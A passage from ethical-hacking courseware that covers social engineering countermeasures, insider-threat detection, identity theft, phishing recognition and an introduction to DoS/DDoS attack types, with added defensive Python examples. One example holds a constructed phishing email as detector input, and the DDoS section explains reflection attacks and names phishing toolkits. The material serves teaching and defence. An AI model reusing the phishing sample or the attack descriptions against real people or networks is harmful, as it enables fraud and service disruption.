- Avoid storing passwords on media or writing them down on a notepad or sticky note.
- Avoid communicating passwords over the phone or through email.
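The password-policy safeguards listed above (length and complexity requirements, rejecting passwords built from answers to "social engineering questions", and blocking an account after a number of failed attempts) can be enforced mechanically at the point where a password is set or a login is attempted. The following is an added example written for this page, not code from the courseware; the policy values, the sample security-question answers, and the usernames are constructed assumptions, and the minimum length used is the upper end of the 6-8 character range the text gives.

```python
import re
from dataclasses import dataclass, field

# Policy parameters are assumptions for this example (the text allows a 6-8 character
# minimum; this uses the upper end of that range).
MIN_LENGTH = 8
MAX_FAILED_ATTEMPTS = 5      # lock the account at the fifth failure
LOCKOUT_SECONDS = 900        # 15-minute lockout, also the window in which failures are counted

# Constructed answers to the "social engineering questions" the text names; in a real
# system these would come from the user's own profile data.
SOCIAL_ENGINEERING_ANSWERS = {
    "birthplace": "austin",
    "favorite_movie": "alien",
    "pet_name": "rex",
}


def check_password_policy(password: str, known_answers: dict) -> list:
    """Return the list of policy violations; an empty list means the password is acceptable."""
    problems = []
    if len(password) < MIN_LENGTH:
        problems.append(f"shorter than {MIN_LENGTH} characters")
    if not re.search(r"[a-z]", password):
        problems.append("no lowercase letter")
    if not re.search(r"[A-Z]", password):
        problems.append("no uppercase letter")
    if not re.search(r"[0-9]", password):
        problems.append("no digit")
    if not re.search(r"[^A-Za-z0-9]", password):
        problems.append("no special character")
    lowered = password.lower()
    for label, answer in known_answers.items():
        # Reject passwords built from facts an attacker can obtain simply by asking the user.
        if answer and answer.lower() in lowered:
            problems.append(f"contains guessable answer ({label})")
    return problems


@dataclass
class LockoutTracker:
    """Counts failed logins per user and blocks the account after MAX_FAILED_ATTEMPTS."""
    failures: dict = field(default_factory=dict)      # user -> list of failure timestamps
    locked_until: dict = field(default_factory=dict)  # user -> time the lock expires

    def is_locked(self, user: str, now: float) -> bool:
        return self.locked_until.get(user, 0.0) > now

    def record_failure(self, user: str, now: float) -> bool:
        """Record one failed attempt at time `now`; return True if the account is (now) locked."""
        if self.is_locked(user, now):
            return True
        # Only failures inside the counting window are kept.
        attempts = [t for t in self.failures.get(user, []) if now - t < LOCKOUT_SECONDS]
        attempts.append(now)
        self.failures[user] = attempts
        if len(attempts) >= MAX_FAILED_ATTEMPTS:
            self.locked_until[user] = now + LOCKOUT_SECONDS
            self.failures[user] = []
            return True
        return False

    def record_success(self, user: str) -> None:
        """A successful login clears the failure history."""
        self.failures.pop(user, None)


if __name__ == "__main__":
    for candidate in ("Tr0ub4dor&3xyz", "Ab1!", "Rex2024!!"):
        print(candidate, "->", check_password_policy(candidate, SOCIAL_ENGINEERING_ANSWERS) or "OK")
    tracker = LockoutTracker()
    for second in range(5):
        print("attempt", second + 1, "locked:", tracker.record_failure("alice", 1000.0 + second))
```

The lockout counter keys on the account, not on the source address, so an attacker cannot avoid it by spreading guesses over many machines; the cost is that an attacker can deliberately lock out a legitimate user, which is why the lock is time-limited rather than permanent.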
Physical Security Policies
- Office security or personnel must escort visitors to designated visitor rooms or lounges.
- Restrict access to certain areas of an organization to prevent unauthorized users from compromising the security of sensitive data.
- Dispose of old documents that contain valuable information by using equipment such as paper shredders and burn bins. This prevents information gathering by attackers using techniques such as dumpster diving.
- Employ security personnel to protect people and property in an organization; supplement trained security personnel with alarm systems, surveillance cameras, and other equipment.
Defense Strategy
- Social Engineering Campaign: An organization should conduct numerous social engineering exercises using different techniques on a diverse group of people in order to examine how its employees might react to real social engineering attacks.
- Gap Analysis: Using the information obtained from the social engineering campaign, a gap analysis evaluates the organization based on industry-leading practices, emerging threats, and mitigation strategies.
- Remediation Strategies: Depending upon the result of the evaluation in the gap analysis, organizations develop a detailed remediation plan to mitigate the weaknesses or the loopholes found in the earlier step. The plan focuses mainly on educating and creating awareness among employees based on their roles and on identifying and mitigating potential threats to the organization.
Some additional countermeasures against social engineering are as follows:
- Train Individuals on Security Policies: An efficient training program consists of basic social engineering concepts and techniques, all security policies, and methods to increase awareness of social engineering.
- Implement Proper Access Privileges: There should be administrator, user, and guest accounts with respective levels of authorization.
- Presence of a Proper Incident Response Time: There should be proper guidelines for reacting to a social engineering attempt.
- Availability of Resources Only to Authorized Users: Make sure sensitive information is secured and that resources are only accessed by authorized users.
- Scrutinize Information: Categorize the information as top secret, proprietary, for internal use only, for public use, or use other categories.
- Perform a Background Check and Proper Termination Process: Insiders with a criminal background and terminated employees are easy targets for procuring information.
- Anti-Virus and Anti-Phishing Defenses: Use multiple layers of anti-virus defenses at end-user and mail gateway levels to minimize social engineering attacks.
- Implement Two-Factor Authentication: Instead of fixed passwords, use two-factor authentication for high-risk network services such as VPNs and modem pools. In the two-factor authentication (TFA) approach, the user must present two different forms of proof of identity. If an attacker is trying to break into a user account, they need to break both forms of identity, which is more difficult to do. Hence, TFA is a defense-in-depth security mechanism and part of the multifactor authentication family. The two pieces of evidence that a user provides could include a physical token such as a card, and typically something the person can remember without much effort, such as a security code, PIN, or password.
- Adopt Documented Change Management: A documented change-management process is more secure than an ad-hoc process.
- Ensure Regular Updates of Software: Organizations should ensure that the system and software are regularly patched and updated, as attackers exploit unpatched and out-of-date software to obtain useful information to launch an attack.
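The two factors described above (something the user knows, such as a password, plus a code produced by a token the user holds) can be illustrated with a time-based one-time password (RFC 6238), which is how most software and hardware authenticator tokens derive their codes from a shared secret and the current time. The following is an added example written for this page, not code from the courseware or from any product it names; the user database, the PBKDF2 salt, and the shared secret (the RFC 4226/6238 test-vector secret) are constructed assumptions.

```python
import hashlib
import hmac
import struct

# RFC 4226 / RFC 6238 test-vector secret, used here as a constructed example secret.
SECRET = b"12345678901234567890"


def hotp(secret: bytes, counter: int, digits: int = 6) -> str:
    """HMAC-based one-time password (RFC 4226): HMAC-SHA1 over the 8-byte big-endian
    counter, dynamic truncation to a 31-bit integer, then the low `digits` decimal digits."""
    digest = hmac.new(secret, struct.pack(">Q", counter), hashlib.sha1).digest()
    offset = digest[-1] & 0x0F
    code = struct.unpack(">I", digest[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret: bytes, timestamp: int, step: int = 30, digits: int = 6) -> str:
    """Time-based OTP (RFC 6238): HOTP with the counter set to Unix time // step."""
    return hotp(secret, timestamp // step, digits)


def verify_totp(secret: bytes, code: str, timestamp: int, step: int = 30, window: int = 1) -> bool:
    """Accept the code for the current time step and `window` steps on either side,
    which tolerates small clock drift between the token and the server."""
    counter = timestamp // step
    for candidate in range(counter - window, counter + window + 1):
        if hmac.compare_digest(hotp(secret, candidate), code):
            return True
    return False


def make_user(password: str, totp_secret: bytes, salt: bytes = b"constructed-salt") -> dict:
    """Store a salted PBKDF2 hash of the password (factor 1) and the token secret (factor 2)."""
    return {
        "salt": salt,
        "pw_hash": hashlib.pbkdf2_hmac("sha256", password.encode(), salt, 100_000),
        "totp_secret": totp_secret,
    }


# Constructed user database for the example.
USERS = {"alice": make_user("correct horse battery", SECRET)}


def authenticate(user_db: dict, username: str, password: str, code: str, timestamp: int) -> bool:
    """Both factors must be correct. Both checks always run, so a wrong password does not
    reveal (through timing) whether the one-time code happened to be right."""
    user = user_db.get(username)
    if user is None:
        return False
    password_ok = hmac.compare_digest(
        hashlib.pbkdf2_hmac("sha256", password.encode(), user["salt"], 100_000),
        user["pw_hash"],
    )
    code_ok = verify_totp(user["totp_secret"], code, timestamp)
    return password_ok and code_ok


if __name__ == "__main__":
    now = 1_700_000_000
    print("current code:", totp(SECRET, now))
    print("both factors:", authenticate(USERS, "alice", "correct horse battery", totp(SECRET, now), now))
    print("password only:", authenticate(USERS, "alice", "correct horse battery", "000000", now))
```

The acceptance window of one step on either side is what makes a stolen code short-lived: a code captured by a phishing page is valid for at most about 90 seconds, and only once the attacker also has the password. A server should additionally refuse to accept the same code twice, which this example does not track.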
Detecting Insider Threats
Most data attacks come from insiders, which only makes them more difficult to prevent or detect. Insiders are mostly aware of the security loopholes of the organization, and they exploit them to steal confidential information. It is essential to carefully handle insider threats, as they are difficult to thwart and may incur huge financial losses and business interruptions. Some of the methods to detect insider threats are given below:
Insider Risk Controls
Insider data risk presents another layer of complexity for security professionals. It requires designing security infrastructure in such a way that user permissions, access controls, and user actions are monitored efficiently.
Deterrence Controls
The organization's security framework must contain safeguards, follow recommended actions for employees and IT professionals, provide a separation of duties, and assign privileges. These security controls eliminate or minimize the security risks to the organization's critical assets.
The deterrence controls that security professionals must have in place to deter insider threats are Data Loss Prevention (DLP) tools and Identity and Access Management (IAM) tools.
Some of the deterrence controls are:
- DLP Tools:
  - Symantec Data Loss Prevention (https://www.symantec.com)
  - SecureTrust Data Loss Prevention (https://securetrust.com)
  - Check Point Data Loss Prevention (https://www.checkpoint.com)
- IAM Tools:
  - SailPoint IdentityIQ (https://www.sailpoint.com)
  - RSA SecurID Suite (https://www.rsa.com)
  - Core Access Assurance Suite (https://www.coresecurity.com)
Detection Controls
Security professionals must use a variety of security controls and tools to analyze and detect insider threats in organizations.
The detection controls that security professionals must have in place to detect insider threats are intrusion detection and prevention systems (IDS/IPS), log management systems, and Security Information and Event Management (SIEM) tools.
Some of the detection controls are:
- IDS/IPS Tools:
  - Check Point IPS Software Blade (https://www.checkpoint.com)
  - IBM Security Network Intrusion Prevention System (https://www.ibm.com)
  - AlienVault Unified Security Management (https://www.alienvault.com)
- Log Management Tools:
  - SolarWinds Security Event Manager (https://www.solarwinds.com)
  - Splunk (https://www.splunk.com)
  - Loggly (https://www.loggly.com)
- SIEM Tools:
  - ArcSight ESM (https://www.microfocus.com)
  - LogRhythm NextGen SIEM Platform (https://logrhythm.com)
  - SolarWinds Log & Event Manager (https://www.solarwinds.com)
Insider Threats Countermeasures
There are safety measures that help an organization to prevent or minimize insider threats:
- Separation and rotation of duties: Divide responsibilities among multiple employees to restrict the amount of power or influence held by any individual. This helps to avoid fraud, abuse, and conflict of interest, and facilitates the detection of control failures (including bypassing security controls and information theft). Rotation of duties at random intervals helps an organization to deter fraud or the abuse of privileges.
- Least privileges: Provide users with only enough access privilege to allow them to perform their assigned tasks. This helps maintain information security.
- Controlled access: Access controls in various parts of an organization restrict unauthorized users from gaining access to critical assets and resources.
- Logging and auditing: Perform logging and auditing periodically to check for misuse of company resources.
- Employee monitoring: Use employee monitoring software that records all user sessions and that can be reviewed by security professionals.
- Legal policies: Enforce legal policies to prevent employees from misusing the organization's resources and from stealing sensitive data.
- Archive critical data: Maintain a record of the organization's critical data in the form of archives to be used as backup resources, if needed.
- Employee training on cybersecurity: Train employees on how to protect their credentials and the company's confidential data from attack. They will be able to identify social engineering attempts and take proper mitigation and reporting steps.
- Employee background verification: Ensure thorough background checks of all employees before hiring them by using Google search and social networking sites and consulting previous employers.
- Periodic risk assessment: Perform periodic risk assessments on all the organization's critical assets to identify vulnerabilities, then develop and maintain a risk management strategy to secure those assets from both insider and outsider threats.
- Privileged users monitoring: Implement additional monitoring mechanisms for system administrators and privileged users, as these accounts can be used to deploy malicious code or logic bombs on the system or network.
- Credentials deactivation for terminated employees: Disable all the employee's access profiles to the physical locations, networks, systems, applications, and data immediately after termination.
- Layered defense: Implement multiple layers of defense to prevent and protect critical assets from remote attacks originated by insiders. Develop appropriate remote access policies and procedures to thwart such attacks.
- Physical security: Build a professional security team that monitors the physical security of the organization.
- Surveillance: Install video cameras to monitor all critical assets. Install and enable screen-capturing software on all critical servers.
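Several of the measures above (logging and auditing, privileged-user monitoring, and deactivating the credentials of terminated employees) only pay off if the records are actually reviewed against what the organization expects. The following is an added example written for this page, not code from the courseware or from any product it names; the log format, the log lines, the HR feed of terminated users, the privileged-account list, and the thresholds are all constructed. It runs three checks over audit records: activity by accounts that should already be disabled, privileged commands outside business hours, and a user reading an unusual number of files in one day.

```python
from collections import Counter
from datetime import datetime

# Constructed audit records in a simple "<ISO timestamp> <user> <action> <detail>" format.
SAMPLE_LOGS = "\n".join([
    "2024-03-04T09:12:05 alice LOGIN workstation-17",
    "2024-03-04T09:13:40 alice FILE_READ /share/finance/q1.xlsx",
    "2024-03-04T23:47:11 bob SUDO /usr/bin/tar -czf /tmp/export.tgz /srv/db",
    "2024-03-04T23:49:02 bob FILE_READ /srv/db/customers.sql",
    "2024-03-05T02:10:30 carol LOGIN vpn-gw-1",
] + [f"2024-03-05T10:{minute:02d}:00 dave FILE_READ /share/hr/file{minute}.csv" for minute in range(12)])

TERMINATED_USERS = {"carol"}        # constructed HR feed: accounts that should already be disabled
PRIVILEGED_USERS = {"bob", "root"}  # constructed list of administrators under extra monitoring
BUSINESS_HOURS = range(8, 19)       # 08:00 to 18:59 counts as normal working hours
FILE_READ_THRESHOLD = 10            # file reads per user per day before alerting


def parse_record(line: str):
    """Split one log line into (timestamp, user, action, detail); detail may contain spaces."""
    stamp, user, action, detail = line.split(" ", 3)
    return datetime.fromisoformat(stamp), user, action, detail


def insider_alerts(log_text: str) -> list:
    """Run the three checks over the log text and return human-readable alerts."""
    alerts = []
    reads_per_user_day = Counter()
    for line in log_text.splitlines():
        if not line.strip():
            continue
        when, user, action, detail = parse_record(line)
        # Check 1: any activity by an account that HR reports as terminated.
        if user in TERMINATED_USERS:
            alerts.append(f"terminated account {user} performed {action} at {when.isoformat()}")
        # Check 2: privileged commands outside business hours.
        if user in PRIVILEGED_USERS and action == "SUDO" and when.hour not in BUSINESS_HOURS:
            alerts.append(f"privileged user {user} ran '{detail}' outside business hours at {when.isoformat()}")
        # Check 3 (aggregated below): unusually many file reads by one user on one day.
        if action == "FILE_READ":
            reads_per_user_day[(user, when.date())] += 1
    for (user, day), count in sorted(reads_per_user_day.items()):
        if count >= FILE_READ_THRESHOLD:
            alerts.append(f"{user} read {count} files on {day} (threshold {FILE_READ_THRESHOLD})")
    return alerts


if __name__ == "__main__":
    for alert in insider_alerts(SAMPLE_LOGS):
        print("ALERT:", alert)
```

The first check is the one that catches a missed deactivation: it needs no threshold, only an authoritative list of who should no longer have access, which is why the credential-deactivation step above has to feed whatever reviews the logs.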
Identity Theft Countermeasures
Identity theft occurs when someone uses personal information (such as a name, Social Security number, date of birth, mother's maiden name, or address) without the person's knowledge or permission in a malicious way, such as for credit card or loan services, or even rentals and mortgages.
Countermeasures against identity theft include the following:
- Ensure your name is not present in marketers' hit lists
- Protect your personal information from being published
- Review your credit card statements regularly and store them securely, out of reach of others
- Do not display or share any account or contact numbers unless mandatory
- Monitor online banking activities regularly
- Install host security tools such as a firewall and anti-virus on your personal computer
Some additional countermeasures against identity theft are as follows:
- To keep mail secure, empty your mailbox quickly and do not reply to unsolicited email requests asking for personal information
- Shred credit card offers and "convenience checks" that are not useful
- Do not store any financial information on the system, and use strong passwords for all financial accounts
- Check telephone and cell phone bills for calls you did not make
- Keep your Social Security card, passport, license, and other valuable personal information hidden and secured
- Read website privacy policies
- Be cautious before clicking on a link provided in an email or instant message
How to Detect Phishing Emails?
To detect phishing emails, first, hover your mouse pointer over the name in the "From" column. Doing so will show whether the original domain name is linked to the sender's "From" name; if it is not, then it could be a phishing email. For example, an email from Gmail.com should probably display its domain as "gmail.com."
Check to see if the email provides a URL and prompts the user to click on it. If so, ensure that the link is legitimate by hovering the mouse pointer over it (to display the link's URL) and ensure it uses encryption (https://). Note that HTTPS alone does not prove that a site is legitimate, since phishing sites can also obtain certificates; the domain itself must be the one you expect. To be on the safe side, always open a new window and visit the site by typing its address in directly instead of clicking on the link provided in the email. Do not provide any information to the suspicious website, as it will likely link directly to the attacker.
A few other indicators of phishing emails:
- It seems to be from a bank, company, or social networking site and has a generic greeting
- It seems to be from a person listed in your email address book
- It has an urgent tone or makes a veiled threat
- It may contain grammatical or spelling mistakes
- It includes links to spoofed websites
- It may contain offers that seem to be too good to be true
- It includes official-looking logos and other information taken from legitimate websites
- It may contain a malicious attachment
Figure 9.15: Screenshot of an email showing indications of phishing
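The checks described above (does the "From" display name match the domain the mail actually came from, does a link's visible text match where it really points, is the link plain http or a bare IP address, is the tone urgent) can be applied mechanically to a message before anyone clicks. The following is an added example written for this page, not code from the courseware; the two sample messages, the brand-to-domain mapping, and the urgency word list are constructed, and the domain comparison only looks at the last two labels of a hostname, which is enough for the .com and .org cases shown but not for registries such as .co.uk.

```python
import re
from email import policy
from email.parser import BytesParser
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample messages; neither is a real email.
PHISHING_EMAIL = b"""\
From: "PayPal Security" <alerts@paypa1-verify.example>
To: victim@example.com
Subject: URGENT: your account will be suspended
Content-Type: text/html; charset=utf-8

<html><body><p>Dear Customer,</p>
<p>Your account has been limited. Click
<a href="http://203.0.113.7/login">https://www.paypal.com/signin</a> within 24 hours.</p>
</body></html>
"""

BENIGN_EMAIL = b"""\
From: "Example Shop" <news@example.org>
To: customer@example.com
Subject: Autumn newsletter
Content-Type: text/html; charset=utf-8

<html><body><p>Hello,</p>
<p>Thanks for shopping with us. Browse <a href="https://www.example.org/sale">our autumn sale</a>.</p>
</body></html>
"""

# Brand names that appear in display names and the domain each should send from (constructed).
EXPECTED_DOMAINS = {"paypal": "paypal.com"}
URGENCY_WORDS = ("urgent", "immediately", "suspended", "within 24 hours", "verify your account")
HOST_RE = re.compile(r"(?:https?://)?([A-Za-z0-9.-]+\.[A-Za-z]{2,})(?:/\S*)?")
IPV4_RE = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")


class LinkExtractor(HTMLParser):
    """Collect (href, visible anchor text) pairs from an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def registered_domain(host: str) -> str:
    """Reduce a hostname to its last two labels; IP addresses are returned unchanged."""
    host = host.lower()
    if IPV4_RE.fullmatch(host):
        return host
    return ".".join(host.split(".")[-2:])


def phishing_indicators(raw: bytes) -> list:
    """Return human-readable findings for one raw message; an empty list means nothing fired."""
    msg = BytesParser(policy=policy.default).parsebytes(raw)
    findings = []

    # 1. The "From" display name versus the domain the mail actually came from.
    sender = msg["From"].addresses[0]
    display = (sender.display_name or "").lower()
    for brand, expected in EXPECTED_DOMAINS.items():
        if brand in display and registered_domain(sender.domain) != expected:
            findings.append(f"display name claims {brand!r} but sender domain is {sender.domain}")

    # 2. Urgent tone or veiled threat in the subject or body.
    body = msg.get_body(preferencelist=("html", "plain")).get_content()
    text = ((msg["Subject"] or "") + " " + body).lower()
    if any(word in text for word in URGENCY_WORDS):
        findings.append("urgent tone or veiled threat")

    # 3. Each link: plain http, bare IP target, and visible text that names a different host.
    extractor = LinkExtractor()
    extractor.feed(body)
    for href, anchor in extractor.links:
        target = urlparse(href)
        target_host = target.hostname or ""
        if target.scheme == "http":
            findings.append(f"link to {href} is not HTTPS")
        if IPV4_RE.fullmatch(target_host):
            findings.append(f"link target is a bare IP address ({target_host})")
        shown = HOST_RE.fullmatch(anchor)
        if shown and registered_domain(shown.group(1)) != registered_domain(target_host):
            findings.append(f"link text shows {shown.group(1)} but points to {target_host}")
    return findings


if __name__ == "__main__":
    for name, raw in (("phishing", PHISHING_EMAIL), ("benign", BENIGN_EMAIL)):
        print(name, "->", phishing_indicators(raw) or ["no indicators"])
```

The link-text check is the automated form of "hover over the link": the anchor text is what the reader sees, the href is where the browser goes, and a mismatch between the two is the spoofed-website indicator from the list above.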
Anti-Phishing Toolbar
Netcraft
Source: https://toolbar.netcraft.com
The Netcraft anti-phishing community is a giant neighborhood watch scheme, empowering the most alert and most expert members to defend everyone within the community against phishing attacks. The Netcraft Toolbar provides updated information about sites that users visit regularly and blocks dangerous sites. The toolbar provides a wealth of information about popular websites. This information will help to make an informed choice about the integrity of those sites.
As shown in the screenshot, Netcraft protects individuals and organizations from phishing attacks and fraudsters.
Figure 9.16: Screenshot of Netcraft (a suspected malicious page blocked by the Netcraft toolbar)
PhishTank
Source: https://phishtank.com
PhishTank is a collaborative clearinghouse for data and information about phishing on the Internet. It provides an open API for developers and researchers to integrate anti-phishing data into their applications.
As shown in the screenshot, security professionals can use PhishTank to check whether a suspicious URL is a phishing site or not.
Figure 9.17: Screenshot of PhishTank
Common Social Engineering Targets and Defense Strategies
Attackers implement various social engineering techniques to trick people into providing sensitive information about their organizations, thus helping attackers to launch malicious activities. These techniques are used on privileged individuals or those who deal with important information.
The table below shows common social engineering targets, the various social engineering techniques that attackers use against them, and the defense strategies to counter these attacks.

| Social Engineering Targets | Attack Techniques | Defense Strategies |
|---|---|---|
| Front office and help desk staff | Eavesdropping, shoulder surfing, impersonation, persuasion, and intimidation | Train employees never to reveal passwords or other information over the phone. Enforce policies for the front office and help desk personnel. |
| Technical support executives and system administrators | Impersonation, persuasion, intimidation, fake SMS, calls, and emails | Train technical support executives and system administrators never to reveal passwords or other information over the phone or email. |
| Office | Shoulder surfing, eavesdropping, and ingratiation | Implement employee training, best practices, and checklists for using passwords. Escort all guests. |
| Vendors of the target organization | Impersonation, persuasion, and intimidation | Educate vendors about social engineering. |
| Mail room | Theft, damage, or forging of mails | Lock and monitor the mail room; train employees. |
| Company's executives | Fake SMS, phone calls, and emails designed to grab confidential data | Train executives never to reveal identity, passwords, or other confidential information over the phone or email. |
| Dumpsters | Dumpster diving | Keep all trash in secured, monitored areas; shred important data; and erase magnetic media. |

Table 9.3: Common social engineering targets and defense strategies
Social Engineering Tools
Social Engineering Toolkit (SET)
Source: https://www.trustedsec.com
The Social-Engineer Toolkit (SET) is an open-source Python-driven tool aimed at penetration testing via social engineering. It is a generic exploitation framework designed to perform advanced attacks against the human element in order to compromise a target and make them offer sensitive information. SET categorizes attacks such as email, web, and USB attacks according to the attack vector used to trick humans. The toolkit attacks human weakness, exploiting the trusting, fearful, greedy, and helpful nature of humans.
Figure 9.18: Screenshot of SET showing menu and attack options
Some social engineering tools are listed below:
- SpeedPhish Framework (SPF) (https://github.com)
- Gophish (https://getgophish.com)
- King Phisher (https://github.com)
- LUCY (https://www.lucysecurity.com)
- MSI Simple Phish (https://microsolved.com)
Audit Organization's Security for Phishing Attacks using OhPhish
OhPhish is a web-based portal to test employees' susceptibility to social engineering attacks through phishing simulation.
Figure 9.19: Screenshot of OhPhish
Module Summary
This module discussed social engineering concepts along with the various phases of a social engineering attack. It also discussed various human-based, computer-based, and mobile-based social engineering techniques. The module discussed insider threats, including the various types of insider threats. It gave an overview of impersonation on social networking sites. It also discussed identity theft and the types of identity theft. The module ended with a detailed discussion of various signs to watch for and countermeasures to employ in order to defend against social engineering attacks, insider threats, and identity theft.
The next module will show how attackers, as well as ethical hackers and penetration testers, perform DoS/DDoS attacks.
Certified Ethical Hacker
Module 10: Denial-of-Service
Module Objectives
- Overview of Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
- Understanding Different DoS/DDoS Attack Techniques
- Understanding Various DoS and DDoS Attack Tools
- Understanding Different Techniques to Detect DoS and DDoS Attacks
- Understanding Different DoS/DDoS Countermeasures
Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) attacks are a major threat to computer networks. These attacks attempt to make a machine or network resource unavailable to its authorized users. Usually, DoS/DDoS attacks exploit vulnerabilities in the implementation of the Transmission Control Protocol (TCP)/Internet Protocol (IP) model or bugs in a specific operating system (OS).
This module starts with an overview of DoS and DDoS attacks and then provides insight into different DoS/DDoS attack techniques. Later, it discusses the botnet network, DoS/DDoS attack tools, techniques to detect DoS/DDoS attacks, and DoS/DDoS countermeasures.
At the end of this module, you will be able to do the following:
- Describe DoS/DDoS concepts
- Understand various DoS/DDoS attack techniques
- Describe botnets
- Illustrate DoS/DDoS case studies
- Explain different DoS/DDoS attack tools
- Apply best practices to mitigate DoS/DDoS attacks
Module Flow
DoS/DDoS Concepts
For a good understanding of DoS/DDoS attacks, one must be familiar with the related concepts in advance. This section defines DoS and DDoS attacks and discusses how DDoS attacks work.
What is a DoSAttack?
is
{©Denia.fService(00S) an attack computer
ona or
network
hat reduces,
restrits orprevents
Whatis a DoSAttack?
A DoS attack is an attack on a computer or network that reduces, restricts, or prevents access to system resources for legitimate users. In a DoS attack, attackers flood a victim's system with non-legitimate service requests or traffic to overload its resources and bring down the system, leading to the unavailability of the victim's website or at least significantly reducing the system or network performance. The goal of a DoS attack is to keep legitimate users from using the system, rather than to gain unauthorized access to a system or to corrupt data. The following are examples for types of DoS attacks:

- Flooding the victim's system with more traffic than it can handle
- Flooding a service (e.g., Internet Relay Chat [IRC]) with more events than it can handle
- Crashing a TCP/IP stack by sending corrupt packets
- Crashing a service by interacting with it in an unexpected manner
- Hanging a system by causing it to go into an infinite loop
Figure 10.1: Schematic of a DoS attack
DoS attacks have various forms and target various services. The attacks may cause the following:

- Consumption of resources
- Consumption of bandwidth, disk space, CPU time, or data structures
- Actual physical destruction or alteration of network components
- Destruction of programming and files in a computer system
In general, DoS attacks target network bandwidth or connectivity. Bandwidth attacks overflow the network with a high volume of traffic by using existing network resources, thereby depriving legitimate users of these resources. Connectivity attacks overflow a system with a large number of connection requests, consuming all available OS resources to prevent the system from processing legitimate user requests.
What is a DDoS Attack?
Source:http://searchsecurity.techtarget.com
A DDoS attack is a large-scale, coordinated attack on the availability of services on a victim's system or network resources, and it is launched indirectly through many compromised computers (botnets) on the Internet.

As defined by the World Wide Web Security FAQ, "A distributed denial-of-service (DDoS) attack uses many computers to launch a coordinated DoS attack against one or more targets. Using client/server technology, the perpetrator is able to multiply the effectiveness of the denial of service significantly by harnessing the resources of multiple unwitting accomplice computers, which serve as attack platforms."

The flood of incoming messages to the target system essentially forces it to shut down, thereby denying service to legitimate users. The services under attack belong to the "primary victim," whereas the compromised systems used to launch the attack are called "secondary victims." The use of secondary victims in performing a DDoS attack enables the attacker to mount a large and disruptive attack while making it difficult to track down the original attacker.

The primary objective of a DDoS attack is to first gain administrative access on as many systems as possible. In general, attackers use a customized attack script to identify potentially vulnerable systems. After gaining access to the target systems, the attacker uploads and runs DDoS software on these systems at the time chosen to launch the attack.

DDoS attacks have become popular because of the easy accessibility of exploit plans and the negligible amount of brainwork required to execute them. These attacks can be very dangerous because they can quickly consume the largest hosts on the Internet, rendering them useless.
The impacts of DDoS include the loss of goodwill, disabled networks, financial losses, and disabled organizations.
How do DDoS Attacks Work?

In a DDoS attack, many applications barrage a target browser or network with fake exterior requests that make the system, network, browser, or site slow, useless, and disabled or unavailable.

The attacker initiates the DDoS attack by sending a command to zombie agents, which are Internet-connected computers compromised by an attacker through malware programs to perform various malicious activities through a command and control (C&C) server. These zombie agents send a connection request to a large number of reflector systems with the spoofed IP address of the victim, which causes the reflector systems to presume that these requests originate from the victim's machine instead of the zombie agents. Hence, the reflector systems send the requested information (response to the connection request) to the victim. Consequently, the victim's machine is flooded with unsolicited responses from several reflector computers simultaneously, which may either reduce the performance or cause the victim's machine to shut down completely.
Figure 10.2: Schematic of a DDoS attack
Module Flow

DoS/DDoS Attack Techniques

Attackers implement various techniques to launch DoS/DDoS attacks on target computers or networks. This section discusses the basic categories of DoS/DDoS attack vectors and various attack techniques.
Basic Categories of DoS/DDoS Attack Vectors
DDoS attacks mainly aim to diminish the network bandwidth by exhausting network, application, or service resources, thereby restricting legitimate users from accessing system or network resources. In general, DoS/DDoS attack vectors are categorized as follows:

Volumetric Attacks

These attacks exhaust the bandwidth either within the target network/service or between the target network/service and the rest of the Internet to cause traffic blockage, preventing access to legitimate users. The attack magnitude is measured in bits per second (bps).

Volumetric DDoS attacks generally target protocols such as the Network Time Protocol (NTP), Domain Name System (DNS), and Simple Service Discovery Protocol (SSDP), which are stateless and do not have built-in congestion avoidance features. The generation of a large number of packets can cause the consumption of the entire bandwidth on the network. A single machine cannot make enough requests to overwhelm network equipment. Hence, in DDoS attacks, the attacker uses several computers to flood a victim. In this case, the attacker can control all the machines and instruct them to direct traffic to the target system. DDoS attacks flood a network, causing a significant statistical change in network traffic that overwhelms network equipment such as switches and routers. Attackers use the processing power of a large number of geographically distributed machines to generate huge traffic directed at the victim, which is why such an attack is called a DDoS attack.
There are two types of bandwidth depletion attacks:

- In a flood attack, zombies send large volumes of traffic to the victim's systems to exhaust the bandwidth of these systems.
- In an amplification attack, the attacker or zombies transfer messages to a broadcast IP address. This method amplifies malicious traffic that consumes the bandwidth of the victim's systems.

Attackers use botnets and perform DDoS attacks by flooding the network. The entire bandwidth is used up by attackers, and no bandwidth remains for legitimate use. The following are examples for volumetric attack techniques:

- User Datagram Protocol (UDP) flood attack
- Internet Control Message Protocol (ICMP) flood attack
- Ping of Death (PoD) attack
- Smurf attack
- Pulse wave attack
- Zero-day attack
- Malformed IP packet flood attack
- Spoofed IP packet flood attack
Protocol Attacks

Attackers can also prevent access to a target by consuming types of resources other than bandwidth, such as connection state tables. Protocol DDoS attacks exhaust resources available on the target or on a specific device between the target and the Internet. These attacks consume the connection state tables present in network infrastructure devices such as load balancers, firewalls, and application servers. Consequently, no new connections will be allowed, because the device will be waiting for existing connections to close or expire. In this case, the attack magnitude is measured in packets per second (pps) or connections per second (cps). These attacks can even take over the state of millions of connections maintained by high-capacity devices.

The following are examples for protocol attack techniques:

- Synchronize (SYN) flood attack
- Fragmentation attack
- Spoofed session flood attack
- Acknowledgement (ACK) flood attack
- SYN-ACK flood attack
- ACK and PUSH ACK flood attack
- TCP connection flood attack
- TCP state exhaustion attack
- RST attack
Application Layer Attacks

